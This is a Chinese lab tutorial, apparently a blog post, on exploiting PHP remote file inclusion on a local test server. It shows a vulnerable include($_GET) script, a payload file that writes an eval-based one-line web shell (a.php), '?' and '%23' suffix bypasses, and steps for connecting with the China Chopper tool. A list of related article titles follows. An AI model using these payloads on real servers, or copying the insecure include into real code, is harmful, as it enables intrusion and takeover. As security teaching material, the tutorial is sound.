遠端檔案包含shell
一
預備知識
程式開發人員通常會把可重複使用的函式寫到單個檔案中,在使用某些函式時,直接呼叫此檔案,無須再次編寫,這種呼叫檔案的過程稱為包含。
實驗目的
遠端檔案包含shell
實驗工具
火狐瀏覽器菜刀軟體工具
實驗環境
客戶機一臺(作業系統為Windows Server 2003)伺服器一臺(作業系統為Windows Server 2003)
實驗步驟
1、訪問127.0.0.1/FI/PHP_FI.php?filename=RFI.txt,網頁顯示是遠端檔案包含漏洞。
2、訪問網址127.0.0.1/yi.txt,可以看到可以訪問的木馬。
3.訪問127.0.0.1/FI/PHP_FI.php?filename=http://127.0.0.1/yi.txt會在當前目錄生成一句話木馬a.php
3、開啟桌面的【實驗工具】資料夾,雙擊開啟【中國菜刀】資料夾,找到【中國菜刀.exe】,雙擊開啟。
利用遠端檔案漏洞用菜刀連線,空白處右擊選擇【新增】。
地址處填寫http://127.0.0.1/FI/a.php。新增完畢,雙擊新新增的記錄進行執行
二
1.本機上2.php的程式碼如下
<?php
$sj=$_GET['sj'];
include($sj);
?>
假如我們不能上傳檔案,又想拿到shell,我們ke'y可以先寫一個muma.txt,內容如下:
<?php
$a = "<?php eval(\$_POST['123'])?>";
$b = fopen("a.php","w") or die("123!");
fwrite($b,$a);
fclose($b);
?>
訪問http://ip1/2.php?sj=http://ip2/muma.txt
上菜刀
2(繞過方式).本機上2.php的程式碼如下
<?php
$sj=$_GET['sj'];
include($sj.".html");
?>
muma.txt如上
訪問http://ip1/2.php?sj=http://ip2/muma.txt?
上菜刀
繞過方式分為(1.?繞過 2.#繞過%23)
相關文章
- Shell 檔案包含
- shell基礎教程二十四: shell基礎教程: Shell檔案包含
- Linux Shell檔案之間的包含關係Linux
- 檔案包含漏洞(本地包含配合檔案上傳)
- Shell的遠端協助
- 遠端桌面不能貼上檔案
- NSXMLDocument讀取遠端XML檔案XML
- 檔案包含2
- CTFer——檔案包含
- 如何在 Linux shell 中找出所有包含指定文字的檔案Linux
- shell插入遠端mysql資料MySql
- 檔案包含之包含了Linux檔案描述符Linux
- 什麼是檔案包含漏洞?檔案包含漏洞分類!
- 怎麼遠端傳輸大檔案?
- 遠端登入和複製檔案
- 資料庫遠端檔案匯入資料庫
- PHP下載遠端檔案及獲取檔案內容PHP
- PHP檔案包含 整理PHP
- 檔案包含漏洞示例
- 包含檔案(Include file)
- 智慧小程式檔案館——遠端除錯除錯
- rsync udr——遠端大檔案傳輸加速
- C# 判斷遠端檔案是否存在C#
- Windows 遠端桌面檔案傳輸的方法Windows
- 用vim安全編輯遠端檔案(轉)
- powershell 關閉遠端開啟的檔案
- [Linux shell]查詢某目錄下檔案是否包含某個字串Linux字串
- PHP基礎---檔案包含PHP
- 檔案包含漏洞小結
- [web安全] 檔案包含漏洞Web
- shell配置檔案
- 【shell 】檔案操作
- 遠端檔案管理系統(SpringBoot + Vue)Spring BootVue
- 如何使用scp進行遠端複製檔案?
- mac使用系列之scp下載遠端檔案Mac
- Mac連線遠端Linux管理檔案(samba)MacLinuxSamba
- FTP 傳送檔案到遠端伺服器FTP伺服器
- 在WINDOWS下使用xcopy遠端複製檔案Windows